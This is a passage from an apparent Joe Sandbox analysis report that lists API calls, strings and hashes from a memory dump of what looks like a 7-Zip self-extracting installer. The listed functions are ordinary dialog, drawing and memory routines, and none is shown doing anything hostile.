                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                • String ID: pA
                                                                • API String ID: 801014965-794713698
                                                                • Opcode ID: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
                                                                • Instruction ID: 5929b0b6314edc43fbf3f3d2a0fc95e577a76ca797df3ab901b2fe2a182a5e0d
                                                                • Opcode Fuzzy Hash: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
                                                                • Instruction Fuzzy Hash: 1141ADB2D41344BFDB22CFA5DC55AEABBB9FB09710F20012BE841A3291D7785D81CB59
                                                                APIs
                                                                • GetParent.USER32(?), ref: 00407F94
                                                                • GetWindowLongW.USER32(00000000), ref: 00407F9B
                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00407FB1
                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 00407FCE
                                                                • GetSystemMetrics.USER32(00000031), ref: 00407FE0
                                                                • GetSystemMetrics.USER32(00000032), ref: 00407FE7
                                                                • GetWindowDC.USER32(?), ref: 00407FF9
                                                                • GetWindowRect.USER32(?,?), ref: 00408006
                                                                • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 0040803A
                                                                • ReleaseDC.USER32(?,00000000), ref: 00408042
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                • String ID:
                                                                • API String ID: 2586545124-0
                                                                • Opcode ID: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
                                                                • Instruction ID: 8ffa6a621c4839b38abe7fa2179ce9be6ee40ef55f84cce8d9fec75f1bbbc175
                                                                • Opcode Fuzzy Hash: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
                                                                • Instruction Fuzzy Hash: 8D214F7650021ABFCB019FB8DD48EEF3B69FB08351F004525FA11E2291CB35D920CB65
                                                                APIs
                                                                  • Part of subcall function 004091A7: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
                                                                  • Part of subcall function 004091A7: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
                                                                  • Part of subcall function 004091A7: GetDlgItem.USER32(?,000004B7), ref: 00409222
                                                                  • Part of subcall function 004091A7: SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230
                                                                  • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                  • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                  • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                • GetDlgItem.USER32(?,000004B6), ref: 004094A8
                                                                • DestroyWindow.USER32(00000000), ref: 004094AB
                                                                • CreateWindowExA.USER32(00000200,Edit,0041A840,500100A0,?,?,?,?,?,000004B6,00000000,00000000), ref: 004094E1
                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004094F1
                                                                • GetDlgItem.USER32(?,000004B6), ref: 004094FE
                                                                • SendMessageW.USER32(00000000,00000030,?,00000001), ref: 00409508
                                                                • GetDlgItem.USER32(?,000004B6), ref: 00409512
                                                                • SetFocus.USER32(00000000), ref: 00409515
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystem
                                                                • String ID: Edit
                                                                • API String ID: 2563414232-554135844
                                                                • Opcode ID: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
                                                                • Instruction ID: 4d71b540c7600c41684bbba3335aa98688d5166c257b7e93b864b054f1ea387c
                                                                • Opcode Fuzzy Hash: 1c951395b049d258c5149e896e0566e3ea25c6708d6124f10a7b0945db6253a7
                                                                • Instruction Fuzzy Hash: DA116A71A00204BFEB11ABE5DD49FAFBBBCEF48B00F104429B201F61A1C675AD50876D
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403EDF
                                                                  • Part of subcall function 00402D03: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402D76
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403F05
                                                                • wsprintfA.USER32 ref: 00403F27
                                                                • wsprintfA.USER32 ref: 00403F54
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$wsprintf
                                                                • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                • API String ID: 2704270482-695273242
                                                                • Opcode ID: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
                                                                • Instruction ID: 886d926ed7ba0351d4e9ba57da7cb0629939e873fb03075975f52044c447bd08
                                                                • Opcode Fuzzy Hash: 33b53d402eec6e8f3b12914186b2c5884ffcd7aa6b788d70cfced2d98aefbe1a
                                                                • Instruction Fuzzy Hash: 15218F71A005187BDB05EAA59C86EFE73ADAB48704F14402EF504E31D1CB7DAA068799
                                                                APIs
                                                                • GetDlgItem.USER32(?,000004B3), ref: 0040779F
                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077B2
                                                                • GetDlgItem.USER32(?,000004B4), ref: 004077BC
                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077C4
                                                                • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004077D4
                                                                • GetDlgItem.USER32(?,?), ref: 004077DD
                                                                • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004077E5
                                                                • GetDlgItem.USER32(?,?), ref: 004077EE
                                                                • SetFocus.USER32(00000000,?,?,00000000,00408726,000004B3,00000000,?,000004B3), ref: 004077F1
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ItemMessageSend$Focus
                                                                • String ID:
                                                                • API String ID: 3946207451-0
                                                                • Opcode ID: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
                                                                • Instruction ID: d34367ada3e0903658dac9af1ca1aef10e4e5856eabac84c2cebdb26553fe681
                                                                • Opcode Fuzzy Hash: 68307c55e08eac57185263add51eb06e4822709b00eeca7ae34a923681d662df
                                                                • Instruction Fuzzy Hash: A4F04F712403087BEA216B61DD86F9BBB5EDF80B54F018425F354661F0CBF7AC209A29
                                                                APIs
                                                                • memcpy.MSVCRT(?,0041E470,00000160), ref: 00407E20
                                                                • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00407E3F
                                                                • GetDC.USER32(00000000), ref: 00407E4A
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00407E56
                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407E65
                                                                • ReleaseDC.USER32(00000000,?), ref: 00407E73
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00407E9B
                                                                • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00007643), ref: 00407ED0
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                • String ID:
                                                                • API String ID: 2693764856-0
                                                                • Opcode ID: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
                                                                • Instruction ID: 8154b001b0011d5121478cb58b91efa441906eea3886e432abe560883a3f5ac4
                                                                • Opcode Fuzzy Hash: 6fe21de5e6cf46c2e38258430ab068c08d1ba9f3266b2be4710a35066139e936
                                                                • Instruction Fuzzy Hash: 8421C375941318BFD7215BA1DD48EEB7B7CFF04301F0040B6FA09A2291D7744E948B6A
                                                                APIs
                                                                • GetDC.USER32(?), ref: 0040797F
                                                                • GetSystemMetrics.USER32(0000000B), ref: 0040799B
                                                                • GetSystemMetrics.USER32(0000003D), ref: 004079A4
                                                                • GetSystemMetrics.USER32(0000003E), ref: 004079AC
                                                                • SelectObject.GDI32(?,?), ref: 004079C9
                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004079E4
                                                                • SelectObject.GDI32(?,?), ref: 00407A0A
                                                                • ReleaseDC.USER32(?,?), ref: 00407A19
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                • String ID:
                                                                • API String ID: 2466489532-0
                                                                • Opcode ID: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
                                                                • Instruction ID: 872bb3bd96abf1d963658246664a9f9dec04eac668a7313924c28ae5c7f0044f
                                                                • Opcode Fuzzy Hash: 361b9f72db81968066b11de39633dd2aeb039f56a0627fc63b5b1369e6440dec
                                                                • Instruction Fuzzy Hash: FF216871901209AFCB01CF69DD44A9EBFF4FF08360F10C46AE519A72A0D335AA50DF41
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040895B
                                                                • GetDlgItem.USER32(?,000004B8), ref: 00408979
                                                                • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0040898B
                                                                • wsprintfW.USER32 ref: 004089A9
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00408A41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                • String ID: %d%%
                                                                • API String ID: 3753976982-1518462796
                                                                • Opcode ID: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
                                                                • Instruction ID: dc12f65f6354bcef20b20b64e73197b6a82627a21fa16bd919092f53849079ab
                                                                • Opcode Fuzzy Hash: 51ae72c57df79fbb6cbb7e6395a09830993c207f45adbfda5b45f62387b44217
                                                                • Instruction Fuzzy Hash: C531B371500208BFCB11AF51DD45EEA7BB9FF48304F10802EF986B62E1DB79A910CB59
                                                                APIs
                                                                • EndDialog.USER32(?,00000000), ref: 00408B52
                                                                • KillTimer.USER32(?,00000001), ref: 00408B63
                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408B8D
                                                                • SuspendThread.KERNEL32(00000280), ref: 00408BA6
                                                                • ResumeThread.KERNEL32(00000280), ref: 00408BC3
                                                                • EndDialog.USER32(?,00000000), ref: 00408BE5
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: DialogThreadTimer$KillResumeSuspend
                                                                • String ID:
                                                                • API String ID: 4151135813-0
                                                                • Opcode ID: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
                                                                • Instruction ID: 672def9565bfc40134271a6b6781851c3b106654d45cfef20a52af227c3b9f34
                                                                • Opcode Fuzzy Hash: 636331c51eeec99492c3656744559ca8cb25bf13f1d29267e4cf69c729943fa4
                                                                • Instruction Fuzzy Hash: 101191B4202608EFE7215F52EE85EA7777CFB44745700843EF986A66A1CF396C10DA1D
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004041F8
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000,00404980,?,?), ref: 00404236
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?,00000000), ref: 0040425C
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041A7D8,?,?,?,%%T\,0041A7E8,?,?), ref: 00404264
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: %%T/$%%T\
                                                                • API String ID: 613200358-2679640699
                                                                • Opcode ID: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
                                                                • Instruction ID: df8026740f1f86ca471eb2ea0e41fa98444a64685e80cf153ceacd7fb444c2e9
                                                                • Opcode Fuzzy Hash: 32ef79d1291380c273689fbeb54a3f068f011761e48dfc995dcc37c28d559008
                                                                • Instruction Fuzzy Hash: D411C97190010AAACF05FFA2D856CEDBB78AF14708F10846AB551760E2DF789B95CB48
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 004042B3
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004042F1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?,00000000), ref: 00404317
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041A7D8,?,?,?,%%S\,0041A7E8,?,?), ref: 0040431F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: %%S/$%%S\
                                                                • API String ID: 613200358-358529586
                                                                • Opcode ID: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
                                                                • Instruction ID: 4488bc9e4ce621475e7ac020b16d4e8be87a05eb600b5e71f20f3fc481b48b4f
                                                                • Opcode Fuzzy Hash: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
                                                                • Instruction Fuzzy Hash: 7811C975900109AACF05FFA2D856CEDBB78AF14308F10846AF561760E2DF789B99CB48
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 0040436E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004043AC
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000), ref: 004043D2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?), ref: 004043DA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: %%M/$%%M\
                                                                • API String ID: 613200358-4143866494
                                                                • Opcode ID: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
                                                                • Instruction ID: 1e1ecd5a4810495ff1b5747c8ad1555e4ca49c286c4952b26a2a60c5b9476409
                                                                • Opcode Fuzzy Hash: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
                                                                • Instruction Fuzzy Hash: D411C971900109AACF05FFA2D856CEDBB79AF14308F10846AF551760E2DF785A9ACB58
                                                                APIs
                                                                • memset.MSVCRT ref: 00408519
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00408532
                                                                • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0040854E
                                                                • SHGetMalloc.SHELL32(00000000), ref: 00408578
                                                                  • Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
                                                                  • Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                • String ID: A$A
                                                                • API String ID: 1557639607-3025247501
                                                                • Opcode ID: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
                                                                • Instruction ID: 8e2b46382c4e0e79c38c40a6d9053323f47f27154f6d6a29afbbbbb9270b0dc0
                                                                • Opcode Fuzzy Hash: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
                                                                • Instruction Fuzzy Hash: 41114FB1A00204ABCB10DB95DA48BDE77BCAB88701F1400AEE905E7281DB79DE04CB75
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(uxtheme,?,00409133,000004B1,00000000,?,?,?,?,?,00409240), ref: 00407DB4
                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407DC5
                                                                • GetWindow.USER32(?,00000005), ref: 00407DDE
                                                                • GetWindow.USER32(00000000,00000002), ref: 00407DF4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: Window$AddressLibraryLoadProc
                                                                • String ID: SetWindowTheme$uxtheme
                                                                • API String ID: 324724604-1369271589
                                                                • Opcode ID: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
                                                                • Instruction ID: 9b0de1ac587a4165001920f6b170f50534138ecb837747bbddd8b6d978bb5341
                                                                • Opcode Fuzzy Hash: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
                                                                • Instruction Fuzzy Hash: D3F0A732E4672533C232126A6C48FAB769CDF46B51B094136BD04F7390DFA8DC4041ED
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B824
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B866
                                                                • ??2@YAPAXI@Z.MSVCRT(?,0000001F), ref: 0040B87C
                                                                • memmove.MSVCRT(00000000,?,?,?,0000001F), ref: 0040B899
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0000001F), ref: 0040B8A6
                                                                • memmove.MSVCRT(?,?,?,?,?,0000001F), ref: 0040B8C4
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@memmove
                                                                • String ID:
                                                                • API String ID: 3828600508-0
                                                                • Opcode ID: 47906053c5a29f528d9a88d94d720d9e3123c9d8a4fc5e07c1a02bdcf041b227
                                                                • Instruction ID: 99a0ad40a844e9a3ffa9f049326f458531d7c56977f80c19912095adb51eb10a
                                                                • Opcode Fuzzy Hash: 47906053c5a29f528d9a88d94d720d9e3123c9d8a4fc5e07c1a02bdcf041b227
                                                                • Instruction Fuzzy Hash: 284159B56003048FCB14DF19D880A57B7E9FF88304F14856EEC4A9B346D779E919CBAA
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,0041EA30,00000001,0041EA30,0041EA30,00000001,?,00000000), ref: 00405A1E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041E464,0041EA30,00000001,?,00000000), ref: 00405A80
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041E464,0041EA30,00000001,?,00000000), ref: 00405A98
                                                                  • Part of subcall function 004039E7: lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
